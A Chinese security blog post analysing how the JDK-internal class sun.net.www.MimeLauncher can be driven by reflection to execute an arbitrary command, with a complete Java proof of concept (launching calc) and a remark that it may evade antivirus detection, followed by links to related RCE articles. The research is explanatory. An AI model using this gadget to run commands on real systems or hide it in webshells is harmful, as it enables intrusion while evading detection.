『Java安全』利用反射调用MimeLauncher.run()触发RCE

最新推荐文章于 2025-07-23 09:17:26 发布
最新推荐文章于 2025-07-23 09:17:26 发布
阅读量1.7k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: # Java安全基础 文章标签: Java web安全 rce 命令执行 cmd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/127555739
该博客文章详细分析了Java中rt.jar内的sun.net.www.MimeLauncher类如何通过反射调用run()方法,从而可能引发远程代码执行(RCE)的安全风险。作者指出,关键在于构造MimeEntry、URLConnection、InputStream和设置特定的execPath。通过PoC代码展示了如何构造条件触发RCE,并提醒关注者关注相关安全问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

前言

rt.jar内的sun.net.www.MimeLauncher类的run方法调用了exec

在这里插入图片描述
据说可以有效绕过某些免杀,下面分析一下调用过程

MimeLauncher

run()

在这里插入图片描述
首先:调用了this.m.getTempFileTemplate()方法,this.m是构造器传入的·MimeEntry类,getTempFileTemplate()方法返回了StringMimeEntry.tempFileNameTemplate
在这里插入图片描述
然后run()接着调用了this.getTempFileName(),入参是this.uc.getURL()和上面拿到的String,this.uc是构造器传入的URLConnection,所以这里是获取了连接的URL
在这里插入图片描述
this.getTempFileName()没什么限制,只有第二行这里要保证传入字符串必须存在%s否则substring方法是会报错的
在这里插入图片描述
接着run()下面调用了this.is.read(),this.is是传入的InputStream,要出这个while也很简单,只要保证read返回值<0即可,因此要重写一个read方法恒返回<0就行

在这里插入图片描述
后面就是一些字符串替换什么的了,然后直接执行this.execPath的命令
在这里插入图片描述

因此这个方法只涉及四个重要变量:

  1. 构造器传入MimeEntry:要求TempFileTemplate有一个%s
  2. 构造器传入URLConnection
  3. 构造器传入InputStream:要求重写read方法返回值 < 0
  4. this.execPath是待执行的命令

MimeLauncher()

类属性

在这里插入图片描述
看一下构造器,前三个是调用run必须的变量,后面两个没用到
在这里插入图片描述
这里对this.m.getLaunchString()进行了if判断,首先它获取了MimeEntry的command属性
在这里插入图片描述
然后这个MimeEntry的command属性必须是一个存在的文件才能返回true,而且此时this.execPath也就是待执行的命令会被MimeEntry.command所覆盖
在这里插入图片描述
这个方法涉及两个重要变量:

  1. 构造器传入MimeEntry:command属性必须是一个存在的文件
  2. this.execPath必须在构造器调用之后才能覆盖成待执行的命令

反射调用MimeLauncher.run()触发RCE

条件

总结一下:

  • MimeEntry:TempFileTemplate为%s、command为一个存在的文件路径
  • URLConnection:任意URL,即使只有协议头http://都可以
  • InputStream:重写read()方法返回 < 0
  • MimeLauncher:this.execPath是待执行命令

PoC

package MimeLauncherTest;

import sun.net.www.MimeEntry;
import java.net.URL;
import java.net.URLConnection;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.Constructor;

public class ExecTest {
    public static void main(String[] args) throws Exception{

        String cmd = "cmd /c calc";

        MimeEntry mimeEntry = new MimeEntry("test");

        Class entryClass = Class.forName("sun.net.www.MimeEntry");

        Field tempFileTemplateField = entryClass.getDeclaredField("tempFileNameTemplate");
        tempFileTemplateField.setAccessible(true);
        tempFileTemplateField.set(mimeEntry, "%s");

        Field commandField = entryClass.getDeclaredField("command");
        commandField.setAccessible(true);
        commandField.set(mimeEntry, "C:\\Windows\\System32\\drivers\\etc\\hosts");

        URLConnection urlConnection = new URL("http://").openConnection();

        InputStream is = new InputStream() {
            @Override
            public int read() throws IOException {
                return -1;
            }
        };

        Class launcherClass = Class.forName("sun.net.www.MimeLauncher");

        Constructor mineLauncherConstructor = launcherClass.getDeclaredConstructor(MimeEntry.class, URLConnection.class, InputStream.class, String.class, String.class);
        mineLauncherConstructor.setAccessible(true);
        Thread mimeLauncher = (Thread) mineLauncherConstructor.newInstance(mimeEntry, urlConnection, is, "", "");

        Field execPathField = launcherClass.getDeclaredField("execPath");
        execPathField.setAccessible(true);
        execPathField.set(mimeLauncher, cmd);

        Method runMethod = launcherClass.getDeclaredMethod("run");
        runMethod.setAccessible(true);
        runMethod.invoke(mimeLauncher);

    }
}

在这里插入图片描述
因为创建了FileOutputStream,rce的同时会生成名称包含HJ的文件,详细逻辑可以在getTempFileName()查看(无伤大雅的小细节)

在这里插入图片描述

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://ho1aas.blog.csdn.net/article/details/127555739
版权声明:本文为原创,转载时须注明出处及本声明

JAVA反序列化漏洞浅析
谢公子的博客
12-20 1万+
目录 反序列化漏洞 序列化和反序列化 JAVA WEB中的序列化和反序列化 对象序列化和反序列范例 JAVA中执行系统命令 重写readObject()方法 Apache Commons Collections 反序列化漏洞payload JAVA Web反序列化漏洞的挖掘和利用 由于本人并非JAVA程序员,所以对JAVA方面的知识不是很懂,仅仅是能看懂而已。本文参照几位大佬...
java反序列化RCE回显研究
java276582434的博客
05-25 2598
总结一下常见反序列化RCE回显几种方式如下: a).使用java.net.URLClassLoader类,远程加载自定义类(放在自己服务器上的jar包),可以自定义方法执行。 b).在自定义类中,抛出异常,取得回显结果。 eg:Jboss报错返回命令执行结果。 利用defineClass加载byte[]返回Class对象,不用远程加载恶意类。 直接利用RCE将执行的命令写入服务器文件...
java反射机制的书_Java 基础 - Java反射机制 - 《[Java Web安全] 攻击Java Web应用》 - 书栈网 · BookStack...
weixin_32223631的博客
02-25 269
Java反射机制Java反射(Reflection)是Java非常重要的动态特性,通过使用反射我们不仅可以获取到任何类的成员方法(Methods)、成员变量(Fields)、构造方法(Constructors)等信息,还可以动态创建Java类实例、调用任意的类方法、修改任意的类成员变量值等。Java反射机制是Java语言的动态性的重要体现,也是Java的各种框架底层实现的灵魂。获取Class对象J...
JAVA-不安全反射--RCE
weixin_48421613的博客
05-17 1097
JAVA安全反射造成的RCE小案例
Java 反射机制
lt_xiaodou的博客
07-27 232
反射(Reflection)是Java提供的一项较为高级的功能,它提供了一种动态的API可以获取任何Java类的包括属性、方法、构造器等信息。元素不必在JVM运行时进行确定,反射可以使得它们在运行时动态地进行创建或调用Java反射机制主要提供了以下功能在运行时判断任意一个对象所属的类;在运行时构造任意一个类的对象;在运行时判断任意一个类所具有的成员属性和方法;在运行时调用任意一个对象的方法;生成动态代理。哪些地方会用到反射?加载驱动;...
JavaSE——反射机制
weixin_56341892的博客
01-01 446
反射机制 一、反射机制概述 反射机制的作用 通过java语言中的反射机制可以操作字节码文件。优点类似于黑客。(可以读和修改字节码文件。)通过反射机制可以操作代码片段。(class文件。) 反射机制的相关类在哪个包下? java.lang.reflect.*; 反射机制相关的重要的类 java.lang.Class:代表整个字节码,代表一个类型,代表整个类。 java.lang.reflect.Method:代表字节码中的方法字节码。代表类中的方法。 java.lang.reflect.Co
common-collections中Java反序列化漏洞导致的RCE原理分析
weixin_33797791的博客
03-08 510
隐形人真忙 · 2015/11/11 22:400x00 背景这几天在zone看到了有人提及了有关于common-collections包的RCE漏洞,并且http://zone.wooyun.org/content/23849给出了具体的原理。作为一个业余的安全研究人员,除了会利用之外,还可以探究一下背后的原理。0x01 原理Java反序列化导致的漏洞原理上和PHP反序列一样,也是由于用户的输入...
ThinkPHP 5.x RCE 漏洞分析与利用总结
dengzhasong7076的博客
01-21 5094
近日ThinkPHP出现由于变量覆盖而引起的RCE,其漏洞根本源于thinkphp/library/think/Request.php中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。 例如: 1、大部分payload进入最后rce的函数是调用了call_user_func,其...
php request漏洞利用,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_39722921的博客
03-10 891
近日ThinkPHP出现由于变量覆盖而引起的RCE,其漏洞根本源于thinkphp/library/think/Request.php中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。例如:1、大部分payload进入最后rce的函数是调用了call_user_func,其可控的也只有一...
Thinkphp5.0.x_RCE复现&5.0.24反序列化大礼包
大博的博客
08-07 6827
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 反序列化环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 反序列化的应用(需要存在反序列化的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的写在了前文,如有代码执行疑
ThinkPHP 3.2.x RCE漏洞复现
m0_46616663的博客
11-29 2537
打湖湘杯遇到一个类似的willphp题目,都审到cfile了没做出来。。。于是把这个翻出来搞了一波,过程参考了网上别的师傅的0.0 什么是ThinkPHP ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不
Java安全-CC链全分析
sagic的博客
11-19 2345
Java安全学习,JavaCC链1-7分析
java代码审计工具_Java代码审计汇总系列(六)——RCE
weixin_42315341的博客
02-16 1618
一、概述任意代码执行(Remote Code Execution)是危害最为严重的漏洞之一,挖掘难度也是相对高的,除了常见的文件上传漏洞,还有OS命令注入、表达式注入、模板注入、代码注入和第三方组件漏洞,下面依次讲解审计方法和技巧。二、分类挖掘技巧1、OS命令注入OS命令注入涉及执行系统命令,通过关键字定位执行命令的方法是否参数可控,常用的搜索关键字有:System|exec|passthru|...
webshell之反射免杀
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
11-28 836
主要讲解反射webshell中的利用,以及反射绕过杀软的利用与原理
java rce漏洞原理_rce漏洞 远程代码执行 简介
weixin_42467634的博客
02-27 1950
1)什么是远程代码执行远程命令执行 英文名称:RCE (remote code execution),简称RCE漏洞,是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。2)远程代码执行的特点远程代码执行是指攻击者可能会通过远调用的方式来攻击或控制计算...
Java - Fastjson之RCE攻击模拟(远程代码执行漏洞)
Zong_0915的博客
12-03 1828
Java - Fastjson之RCE问题分析及攻击模拟(远程代码执行漏洞)Fastjson出现RCE问题的必要前提分析 首先,本文的Fastjson相关的RCE问题,针对于版本在1.2.24以下的。 Fastjson出现RCE问题的必要前提分析
url上接收到 el表达式 不渲染_JSP Webshell那些事 -- 攻击篇(上)
weixin_39938875的博客
11-22 358
前言目前很多大型厂商都选择使用Java进行Web项目的开发,近年来随着各种JAVA指定环境RCE漏洞的出现,Java Web安全逐渐被人们所重视,与漏洞相关的还有用于后期维持权限的Webshell。与PHP不同的是,JSP的语言特性较为严格,属于强类型语言,并且在JDK9以前并没有所谓的eval函数。一般而言JSP的变形免杀较为困难,但是依旧存在很多的"黑魔法"。不知攻,焉知防。阿里云安骑士We...
Java代码审计之RCE(远程命令执行
liguangyao213的博客
03-02 6543
Java代码审计系列课程(点我哦) 漏洞原理: RCE漏洞,可让攻击者直接向后台服务器远程注入操做系统命令或者代码,从而控制后台系统。 出现此类漏洞通常由于应用系统从设计上须要给用户提供指定的远程命令操做的接口。通常会给用户提供一个ping操做的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而若是设计者在完成该功能时,没有作严格的安全控制,则可能会致使攻击者经过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 runti
任子行网络安全审计系统
最新发布
qq_35313692的博客
07-23 128
在任子行网络安全审计系统的IPS日志查询功能中,`uname`参数存在SQL注入漏洞。我们可以通过构造恶意的SQL语句,绕过应用程序的访问控制,获取数据库中的敏感信息。,使用fofa测绘仅仅找到一处。: 第105-108行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值